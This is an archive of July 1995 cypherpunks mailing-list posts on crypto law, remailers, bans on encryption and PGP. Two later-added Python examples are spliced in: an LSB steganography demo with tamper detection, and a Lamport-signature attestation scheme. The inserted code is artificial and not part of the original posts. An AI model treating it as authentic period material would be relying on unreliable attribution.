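    """Write a 2-byte length prefix plus payload into the LSB of each cover byte."""
    data = len(payload).to_bytes(2, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for payload")
    out = bytearray(cover)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length prefix and payload back out of the LSBs.

    A tampered length prefix may claim more data than the cover holds;
    slicing simply returns what is there and verification rejects it.
    """
    lsb = [b & 1 for b in stego]

    def take(start: int, nbytes: int) -> bytes:
        chunk = lsb[start:start + 8 * nbytes]
        return bytes(
            sum(bit << (7 - j) for j, bit in enumerate(chunk[i:i + 8]))
            for i in range(0, len(chunk) - 7, 8)
        )

    length = int.from_bytes(take(0, 2), "big")
    return take(16, length)


def send(cover: bytes, msg: bytes, key: bytes) -> bytes:
    # Sign first, then hide message and tag together.
    return embed(cover, msg + sign(key, msg))


def receive(stego: bytes, key: bytes):
    """Return the message if its tag verifies, else None (tampering detected)."""
    payload = extract(stego)
    if len(payload) < TAG_LEN:
        return None
    msg, tag = payload[:-TAG_LEN], payload[-TAG_LEN:]
    return msg if hmac.compare_digest(sign(key, msg), tag) else None


def mitm_rewrite_lsbs(stego: bytes, rng: random.Random) -> bytes:
    # Models the agent in the middle who re-randomizes every LSB in transit.
    return bytes((b & 0xFE) | rng.getrandbits(1) for b in stego)


def lsb_diff(a: bytes, b: bytes) -> int:
    """Count positions where two received copies disagree in the LSB."""
    return sum((x ^ y) & 1 for x, y in zip(a, b))


if __name__ == "__main__":
    cover = bytes((i * 37 + 11) % 256 for i in range(1024))  # constructed "pixels"
    key = b"constructed-demo-key"
    stego = send(cover, b"meet at noon", key)
    print("clean copy verifies:", receive(stego, key))
    first = mitm_rewrite_lsbs(stego, random.Random(1))
    resent = mitm_rewrite_lsbs(stego, random.Random(2))
    print("tampered copy verifies:", receive(first, key))
    print("LSBs differing between the two received copies:", lsb_diff(first, resent))
```
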




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 16 Jul 95 09:35:05 PDT
To: cypherpunks@toad.com
Subject: RICO and Asset Forfeitures
Message-ID: <ac2e8d33170210048e56@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 7/16/95, Andrew Spring wrote:
>>ranked as a mobster subject to RICO.  My guess is that the intent is that
>>from one placement on an FTP server or one posting to a newsgroup, the
>>perpetrator of that heinous act will have passed his RICO qualification and
>>therefore be subject to having all he owns taken from him.
>
>RICO question:  i thought that the idea of RICO is to confiscate assets of
>racketeers that are derived from criminal activities.  PGP and remailer
>software is distributed free.  so would RICO seizures even apply (yes I
>know this doesn't always stop the FBI)?

As I understand RICO (Racketeer-Influenced and Corrupt Organizations Act,
though the euphonious "Rico," a la South American drug kingpins, is the
real reason for the name), only the assets imputed to the illegal act can
be seized. Thus, boats, factories, houses, etc., that are imputed
(believed, claimed) to have been bought partially or wholly from funds from
illegal acts can be seized.

Civil penalties are another matter. If you're charged with distributing
something illegal and a fine of $250,000 is levied, then you may have to
sell everything you own to pay it, but it's not a RICO seizure.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 16 Jul 95 10:22:36 PDT
To: cypherpunks@toad.com
Subject: Re: unix, vanguard
Message-ID: <199507161720.KAA16734@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>If you want to do something like Raph's remailer list, would you rather
>implement it on a pc running windows or with a perl script on a unix 
>box?

Not to prolong this argument, which hopefully won't turn into a lengthy OS
debate, but this argument boils down to the "users vs. developers" situation.

Sure, remailers and remailer lists are better implemented under unix, and
there may be as many as what, 50 people (developers) in the world interested
in doing this? On the other hand, several times that number of users will
access the information and actually give it value; they (users) don't need
unix at all.

Maybe I'm a market share bigot, but to me, if you want to spread crypto to
the masses, you have to do it with tools that run on the platforms the
masses use.

Who knows, perhaps in the future we'll see that the tools, programs, and
front ends run on more popular operating systems, and the relatively fewer
servers and scripts run on unix.

--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 16 Jul 95 09:24:54 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Ack!  It's not my fault!
Message-ID: <Pine.ULT.3.91.950716112354.29821C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Before anybody flames me too bad, I want to poitn out that I only posted 
the PineSign script ONCE.  I don't know why it showed up multiple times.

Most weird.  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAk9cDokqlyVGmCFAQFNaAQAvELOLo9wazD7Tfyl/fyg3Z4wLxdJCXSt
+O61LYzqlzx45+Y7AG3KNiW3GgZFSnJkaUT+dfSpNs7p0M24ruTGYRxnPE0r0+Nk
TrUkPCG4o3YR/azpxq/PzVp2TiOaRL3SyEaSHvNGrSj6nVGLYuosYckylzRpJp/S
WkCcAUqlKg4=
=zbEG
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 16 Jul 95 08:31:04 PDT
To: cypherpunks@toad.com
Subject: PGP-integrated mail readers (was Re: Deployment)
In-Reply-To: <Pine.3.89.9507161551.A1196-0100000@unicorn.com>
Message-ID: <199507161531.LAA27343@janet.advsys.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 16 Jul 95 08:58:06 PDT
To: cypherpunks@toad.com
Subject: G0D_dim
Message-ID: <199507161558.LAA10839@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-16-95. NYPaper:


   "The Spies' Code and How It Broke. The Russians had a
   problem: it's almost impossible to be perfectly random."

      The Russians suffered from a lapse in quality control.
      They inadvertently let some pattern find its way into
      their scrambled codes, a loose thread that allowed
      American code breakers to unravel the scheme. "Given a
      pure, perfect one-time system, you're not going to break
      it," said David Kahn, visiting historian at the N.S.A.'s
      Center for Cryptologic History.                RAN_dum


   "Twilight of the Nukes. The post-war years were spent
   hoarding nuclear weapons. Now it's time to put them away."

      Since that first nuclear test the United States has
      built 70,000 nuclear weapons of almost every conceivable
      kind: warheads, artillery shells, land mines, depth
      charges and even backpack-style plutonium explosives
      weighing 58 pounds but equivalent to 10 tons of TNT. But
      now it is the twilight of the nukes. They are being
      taken apart by the United States and the Soviet Union at
      the rate of 10 or 12 a day, and the new problem is how
      to keep track of them all.                     TWI_god



   >1:  G0D_dim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Sun, 16 Jul 95 09:43:07 PDT
To: cypherpunks@toad.com
Subject: ecm list
Message-ID: <9507161642.AA20001@toast>
MIME-Version: 1.0
Content-Type: text/plain



It may be necessary to remove the ECM mailing list from the MIT
computers (no big surprise here).  The issue isn't the overwhelming
traffic volume on the list; rather, the concern that it might violate
some MIT regulation.

If anyone wants to take it on, please contact me ASAP.

Thanks,
Rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 16 Jul 95 04:52:06 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01510104ac2d9af1127e@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain



>ranked as a mobster subject to RICO.  My guess is that the intent is that
>from one placement on an FTP server or one posting to a newsgroup, the
>perpetrator of that heinous act will have passed his RICO qualification and
>therefore be subject to having all he owns taken from him.

RICO question:  i thought that the idea of RICO is to confiscate assets of
racketeers that are derived from criminal activities.  PGP and remailer
software is distributed free.  so would RICO seizures even apply (yes I
know this doesn't always stop the FBI)?

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sun, 16 Jul 95 11:10:45 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <DyFc9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" <perry@imsi.com> writes:

> > What we can do, however, is to shape the culture of the net.  That
> > culture will have to eventually be listened to by DC.
> 
> The beltway crowd doesn't log in. They ignored the petitions sent to
> Leahy for S.314 because they didn't think of the people who sent the
> petitions in as "real". I doubt they will understand the net for many
> years to come, whereas we have to stall out the NSA and company now.

We need to use e-mail/fax gateways that strip much of the e-mail headers. For
some reason, fax has become so ubiquitous in U.S. businesses (including
Congress) that it has become "mainstream" and creditable.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAlVVt74r4kaz3mVAQFbRQP/dUY0tqbis9Up7sVDt6ydCpO93ZMhtSbd
nUHtXd3+FCf7Phur7w8YMMY5I/VoMCpk9NLu7j9aeYMDtyWupj+Lj9d+wlFhuWHb
bSRr7Y6xvqnbY1mHME0wgRx4FIDinudgG+n/XetaVlQHqQ68YrYsRcCmvt22j0eL
ovPoF92ECyc=
=k7LM
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-885-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 16 Jul 95 11:22:35 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <199507161819.OAA06090@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

PLEASE NOTE: IANAL either [yet] But,

MONTY HARDER wrote:

>     [Please do not start an abortion flamefest on the list. If you want
>     to argue it via Imail, I can handle that, but let's not bother the
>     rest of the class, OK?]

I agree, and this post has nothing to do with that controversy [I hope].

>
>  The Supremes found the right to have an abortion in some kind of
>"penumbral" right to <BOLD> privacy </BOLD>, which in turn came from
>Griswold v. Connecticut, if organic RAM serves. Given this precedent,
>may we challenge anti-crypto crap such as the Grassley Bill as a
>violation of the right to privacy?

Good idea, but I have an idea to upset even *more* people.
First of all, has anyone else noticed how the Republicans have placed
life-and-death emphasis lately on the oft-ignored 10th Amendment.

Amendment X -- "The powers not delegated to the United States by the
Constitution, nor prohibited by it to the States, are reserved to the
States respectively, or to the people."

IMO, the Republicans will continue to do this as long as they can win
the overwhelming majority of governorships, which is for the foreseeable
future. Democrats, of course, don't like this and prefer unconstrained
federal power [preferably in the hands of someone other than Newt, though].
There is, however, another Amendment which goes beyond being oft-ignored 
to the status of being truly forgotten, without ever having been repealed.

Amendment IX -- "The enumeration in the Constitution of certain rights
shall not be construed to deny or disparage others retained by the people."

[The right to write code was among many rights NOT enumerated.]

Republicans AND Democrats ALL HATE the 9th Amendment, which is the primary
reason *I* like it so much. Various lawyers, judges, and [especially]
law professors will sputter that the 9th is "impertinent!" or "irrelevant!" 
and should be ignored, and Jim Ray is just spouting off [again] about the
slow erosion of freedom in this country. My rejoinder is "OK, if we're
supposed to ignore it, why not just REPEAL it, after all, it's just sitting
there doing nothing, cluttering up the rest of the Bill of Rights." Usually,
conversation [and, I suspect, my eventual grade] degenerates at this point.
Those C-punks not in law school, however, should keep the 9th in mind when
talking about Constitutional issues on encryption rights, if for no other
reason than to educate the public. In court, of course, I would concentrate
on the 1st. Apologies to the various lurking law professors on the list, I
am not talking about you. Also, this diatribe is mere academic speculation
and not a legal opinion and IANAL and I have been known to be wrong in the
past and I no-doubt will be wrong again in the future and most people in 
the legal profession think this is wrong so don't rely on it and your lawyer
will think you are crazy if you say this to him (so don't) and so on and
so on...
JMR
>
>
<snip>
Regards, Jim Ray
"It is dangerous to be right when the government is wrong." Voltaire
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAlYGCoZzwIn1bdtAQFAvAF/U/0u/BjNThGjDeeOsv5CujcJcFBKf5Hx
+SsUFAwYyD5I5DWosWA0iTZesc/DO3UR
=bAZm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sun, 16 Jul 95 13:05:20 PDT
To: cypherpunks@toad.com
Subject: A Chronology on crypto bans
Message-ID: <v01520d00ac2f1c6c99eb@[204.91.138.82]>
MIME-Version: 1.0
Content-Type: text/plain


Someone asked why is there such a flurry recently on banning crypto in
recent months. This is not a recent issue. There have been almost non-stop
attempts for the last 15 years.

I've been finishing up this chapter in the book Bruce Schneier and I are
writing on crypto battles. Every so often a new FOIA document floats in
from some request I made 3-4 years ago that makes me have to revise it
again. Here's a small chronology based on the chapter.

------

Attempts to ban encryption 1977-1995



1977-1980 NSA Director Inman calls crypto born secret. Should be restricted.
Attempts to use Invention Secrecy Act of 1951 to patent inventions by
academic researchers. Attempts to use export control laws to limit
scientific discussion.
NSA Threatens NSF over grants for crypto studies.

1981 American Council on Education committee recommends voluntary
submissions of crypto papers to NSA

1984 National Security Decision Directive 145. Gave NSA authority over all
govt crypto and computer security development.

1986 NSTISSP. Attempted to extend NSDD-145 to private sector. Used to
justify visits to LEXIS/NEXIS, Dialog, public libraries etc.

1987 Congress passes Computer Security Act. Gives crypto authority to NIST.

1989 NIST signs MOU with NSA giving back authority to NSA.  NIST starts
development of new public key system to do both signatures and key
exchange.

1990 After pressure by NSA, NIST adopts El Gamal for signatures only. NSA
secretly designs "algorithm on a chip" for key exchange. FBI, NSA and NIST
also begin "National Cryptographic Review".

1991 FBI asks Senator Joseph Biden to introduce "Sense of Congress" to
recommend backdoors in all encryption, telephone systems. Provision
removed after public outcry. Later evolves into digital telephony proposal.
October 1991, NSA, FBI, CIA meet to discuss possible legislation on
encryption.

1992 NIST memo - "FBI working on draft legislation to control and license
all cryptography"

1993 Clipper Proposal introduced. Interagency working group formed by
Presidential Review Directive 27. According to NSA memo on IWG "FBI
proposed legislation to authorize the FCC to regulate common carriers, PBX
operators, and  manufacturers of encryption devices available for use in
the US  to ensure such systems and devices are compatible with law
enforcement electronic surveillance interests....the interagency working
group reviewed proposed legislation and concluded that ....legislation to
authorize regulation of encryption product manufacturers would be
considerably more difficult [than passing the digital telephone proposal]
and required further study." 6 options were discussed including prohibiting
all other encryption besides Clipper. The other five have been classified
"top secret".

--------

Dave


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <dshayer@netcom.com> (David Shayer)
Date: Sun, 16 Jul 95 17:22:43 PDT
To: cypherpunks@toad.com
Subject: Esther Dyson in NYT
Message-ID: <v02120d01ac2f2d3ea33c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Today's (Sunday 7-16-95) NYT Magazine has an excellent (IMHO) article by
Esther Dyson on why the government should not regulate the net.  It's not
written for techies like us, it's written for normal non-wired people, like
our parents and our senators.

The article is clear, easy to follow, makes its points well, and refrains
from overused analogies about highways and roadkill.  So next time you're
at a loss for words arguing with some clueless offline luser about why porn
and pedophiles really aren't  rampant all over the net, show them this
article.

David


+------------------------------------------------------------------------+
|David Shayer                                 dshayer@netcom.com         |
|Sentient Software / Symantec                                            |
|"Spam is not a verb."                                                   |
+------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 17:37:45 PDT
To: CYPHERPUNKS@toad.com
Subject: Mods to Dining Cryptographers: legal questions...
Message-ID: <8AD5422.000300016A.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PF> spend on software patents. I don't, and don't mean to say that _he_
PF> goes around stealing ideas from other people and patenting them.)
PF>
PF> How do I do this and protect myself from the people who do have the
PF> money to go through the intellectual property courthouse game?

  IANAL, but... Create a detached signature certificate of your idea,
and post =that= here. Get some of us to sign it


       I, _______, a resident of _______ County, __________, do hereby
     attest that I received the above certificate on _____ ___,1995.

                [plaintext for non-crypto-aware folks]

and email to you. Also, make two hard copies, including hard copies of
our notarizations you receive back. Put one of them in an envelope with
a 3.5" floppy of everything, and address the =back= to yourself. Go into
the post office, and ask the clerk to hand-cancel the envelope, so that
the cancellation goes half across the flap and the rest on the envelope.
When you get this from yourself in the mail, you put it in your safety-
deposit box or equivalent.

  This way, when you open the envelope in the presence of the Judge/Jury
you have the word of the US Postal Service that you had X idea on Y
date, not to mention the corroborating e-signatures. If Z were to claim
authorship, you could ask Z to prove it by forging your signature on
another document. This could go a long way toward proving the value of
PGP signature to the Unwashed Masses, =and= illustrate the danger of
GACK + corrupt gummit agent (in the light of the Ruby Ridge and Waco
hearings, people will be =quite= sensitive to the fact that agents can
and do abuse their power).

  In fact, the ability for us to be able to attest to your possession of
Document X on Date Y, without any of us ever seeing X itself, is one of
the most powerful uses of digital signatures. I can see Phil Z. being
called as an expert witness, to establish the mechanism involved.  Joe
Sixpack needs to hear Dan Blather mention this on the Evening News. OK,
not Blather, but Koppel would do it. Maybe even John Stossel on 20/20.

  This is what we need to be pushing to the Luddite crowd: The very new
technology that frightens them, because they perceive it as out of their
control, brings with it new means for people to take control. Even if
you lost your case on some other grounds, it would be one of the best PR
bits for PGP I can think of.



 * Don't say "Gun Control", it's "Victim Disarmament".
---
 * Monster@FAmend.Com *    
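
The attestation scheme described in the message above, as an added example that is not part of the original post: the author publishes only a signed digest of the document, each witness signs a dated statement over that digest without ever seeing the document, and the claim is checked later once the document is revealed. Assumptions: Lamport one-time signatures built from SHA-256 stand in for PGP so the example needs only the standard library (each key may sign exactly one message), and all names, counties and dates are constructed.

```python
import hashlib
import os


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


# --- Lamport one-time signatures (stand-in for PGP; one key signs ONE message) ---
def keygen():
    sk = [(os.urandom(32), os.urandom(32)) for _ in range(256)]
    pk = [(H(a), H(b)) for a, b in sk]
    return sk, pk


def _digest_bits(msg: bytes):
    d = H(msg)
    return [(d[i // 8] >> (7 - i % 8)) & 1 for i in range(256)]


def sign(sk, msg: bytes):
    # Reveal one secret per bit of the message digest.
    return [sk[i][bit] for i, bit in enumerate(_digest_bits(msg))]


def verify(pk, msg: bytes, sig) -> bool:
    bits = _digest_bits(msg)
    return len(sig) == 256 and all(
        H(s) == pk[i][b] for i, (s, b) in enumerate(zip(sig, bits))
    )


# --- The scheme from the message ---
def make_certificate(document: bytes, author_sk):
    """What the author posts: a digest and a signature over it, never the text."""
    digest = hashlib.sha256(document).hexdigest()
    return {"digest": digest, "author_sig": sign(author_sk, digest.encode())}


def statement(name, county, state, date, digest) -> bytes:
    # Wording follows the template in the message, with the digest appended.
    return (
        f"I, {name}, a resident of {county} County, {state}, do hereby attest "
        f"that I received the above certificate on {date}.\n{digest}"
    ).encode()


def attest(cert, name, county, state, date, witness_sk):
    """A witness signs the dated statement; only the certificate is needed."""
    fields = (name, county, state, date)
    return {"fields": fields, "sig": sign(witness_sk, statement(*fields, cert["digest"]))}


def verify_claim(document, cert, author_pk, attestations, witness_pks):
    """Return (witness, date) for every attestation that holds for this document."""
    digest = hashlib.sha256(document).hexdigest()
    if digest != cert["digest"]:
        return []  # revealed text is not what was committed to
    if not verify(author_pk, digest.encode(), cert["author_sig"]):
        return []  # certificate was not signed by the claimed author
    valid = []
    for att in attestations:
        name, county, state, date = att["fields"]
        pk = witness_pks.get(name)
        if pk and verify(pk, statement(name, county, state, date, digest), att["sig"]):
            valid.append((name, date))
    return valid


if __name__ == "__main__":
    idea = b"constructed description of the idea"  # stays private until court
    author_sk, author_pk = keygen()
    w1_sk, w1_pk = keygen()
    cert = make_certificate(idea, author_sk)
    atts = [attest(cert, "Witness A", "Example", "XX", "July 17, 1995", w1_sk)]
    print(verify_claim(idea, cert, author_pk, atts, {"Witness A": w1_pk}))
```
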




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Thompson <stevet@smeg.net4.io.org>
Date: Sun, 16 Jul 95 16:34:36 PDT
To: Bolivar Shagnasty <tj@compassnet.com>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Chameleon.4.01.2.950715030350.tj@tjunker.compassnet.com>
Message-ID: <Pine.LNX.3.91.950716174244.1168B-100000@smeg.net4.io.org>
MIME-Version: 1.0
Content-Type: text/plain



Wish I could be more optimistic....

On Sat, 15 Jul 1995, Bolivar Shagnasty wrote:
> Perry Metzger wrote:
> 
> >"Robert A. Hayden" writes:
> >> We've seen the enemy, that they are the 535 senators and representatives 
> >> in D.C., and the staff in the White House.  It's time to shore up our 
> >> allies and enter the battle with the best weapons we have; information 
> >> and popular use.

[snippage]

> Would it be more productive to hire the white shoes or start another few ISPs 
> and shepherd the new users to be privacy-aware letter writers and faxers?  
> Educate your ISPs.  Any ISP that isn't political in this age is brain 
> dead and dead weight.  Any ISP that sees its political interests as somehow 
> different than those of its users (recent lobbying to shift burdens away 
> from national services and onto users, and recent AOL admissions of 
> participation in what sounded like entrapping users) is worse than brain dead 
> -- it's part of the problem.

Speaking for an ISP startup (unofficially :), we're planning to get a 
small startup going within the next few weeks.  Being the technical 
brains behind the company (at least pertaining to the Internet), and 
having a strong idealistic streak, I assure you that I, for one, will be 
exerting as much effort as I can to promote cryptographic awareness for 
the users that subscribe.

Besides running the MixMaster software, I am going to devote a local 
newsgroup to the topic and hold an ongoing tutorial/Q&A session on the 
uses of crypto software.  I'll probably be posting some messages from 
this forum there as appropriate.

I'd like to do something neat like offer mail-drop type accounts -- 
accessible via telnet/POP/IMAP -- for e$, perhaps.

Being in Canada, I think I may have a little more time to get this sort 
of thing entrenched (on my system at least) than you do in the states, 
though I suspect that Uncle Sam may not even notice the border if they 
decide to get heavy-handed.  Perhaps I'm dreaming.

I am depressed at the direction the world is heading.  The issue to me 
seems to be how bad the totalitarianism will get since I think it's 
already here.  I'd really like to be able to move to another country... 
It might buy me ten to twenty years of breathing room before the United 
States encompasses the world.

If anyone gets ahold of any tickets on a rocket off this planet, would 
they please give me a call?
 
> Bolivar

Regards,

Steve Thompson, Internet Consultant at large -- stevet@smeg.net4.io.org
=======================================================================
To the sane mind, even aggression against people is infinitely better
than aggression against infinity. And it is the chief defect of sane
society that it is boring. It is so boring that even sane people
notice it. And so, from time to time, there is a war. This is intended
to divert people's minds before they become so bored that they take to
some impersonal kind of aggressive activity -- such as research, or
asceticism, or inspiration, or something discreditable of that kind.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 16 Jul 95 15:19:36 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: Mods to Dining Cryptographers: legal questions...
Message-ID: <ac2ef6f7130210049cda@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>I'm sorry if I was a little mysterious about my reference to
>another use or mode of a DC-net; I'd _love_ to tell the rest of
>you flat-out, and put the idea in the public domain, but I'm
>not sure I _CAN_.
>

You should investigate an idea known as the provisional patent that is
relatively new to the United States. They're supposedly shorter and
designed to give you some claim to the ideas as well as some time to
develop them enough to file a real patent. I can't give you any other
advice except to tell you that my patent agent is also curious about them
because they're new.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Sun, 16 Jul 95 17:13:25 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <199507170016.TAA23019@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>  Especially if the form letter generated would be randomly selected
>from parallel word streams.  For example:
>
>       Dear Senator <#SENATOR>:
>
>       I am <concerned|alarmed|frightened> by the <attacks on privacy
>     rights in|glaring First Amendment violations in|fascist mentality
>     of|ominous provisions of|potential for civil rights infringement
>     by> SB <#BILLNO> <introduced recently| proposed|offered> by Senator
>     <#ORIGINATOR>.....
>
>  You get the idea.
>
>  Anyone who has read MAD Magazine could put such together. As an added
>bonus, use variable margin settings, and none of the letters would be
>exactly the same. Appropriate Imail => FAX software on a puter in DC
>(local call that way) with the phone number of the sender filled in on
>the top line for ID (izzat legal?) so it doesn't look like a form letter
>at all.
>
>  The web page would generate a random letter, allow the user to edit
>it, further (possibly offering the alternate phrases) before he clicks
>on the [Send] button.
>

If someone in the DC area wants to set up such a system, I'll gladly donate
an Intel SatisFAXion 200 fax/modem, complete with manuals, etc.

This would be a Good Thing, IMHO.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sun, 16 Jul 95 13:50:22 PDT
To: cypherpunks@toad.com
Subject: "Just write code"
Message-ID: <9507162034.AA28228@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>Just write code.  For whatever platform you like writing code for.

And while you're at it, make it as platform-independent as possible.

Porting to another platform or system involves writing code, no?

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ENRIQUE S. IGNARRA" <S0496872@DOMINIC.BARRY.EDU>
Date: Sun, 16 Jul 95 17:53:59 PDT
To: cypherpunks@toad.com
Subject: PGP FAQ
Message-ID: <01HSY9PP2ZSI000DND@DOMINIC.BARRY.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could someone here politely send me some email on where I could get an updated
PGP FAQ?  I have an old one for v2.3a.  I'd like to get an updated one.
But where the old one says to go, the directory no longer exists.

Thanks!

Enrique
s0496872@dominic.barry.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sun, 16 Jul 95 18:46:50 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <751c9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

liberty@gate.net (Jim Ray) writes:

> Amendment IX -- "The enumeration in the Constitution of certain rights
> shall not be construed to deny or disparage others retained by the people."
> 
> [The right to write code was among many rights NOT enumerated.]
> 

Most importantly, it includes the right to decide what the other unenumerated
rights are.....



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAm//N74r4kaz3mVAQHMJAP/RTmdhZc63J6XzL8FfKK6wk9RrXgcOZ4c
kZHGqYzOo0ZJKbmsugOwEjerpGsbeIUu3SzM+vrVA+BaWHLaufELSmh7AQW4/FcY
XyKv3Zu/JBBxEca+H0qbix/q433c+2r2iKJ1p8p1c8jgK/L+c66cJiTgWGMt2vPZ
XBBMaYAOIUg=
=DQyv
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
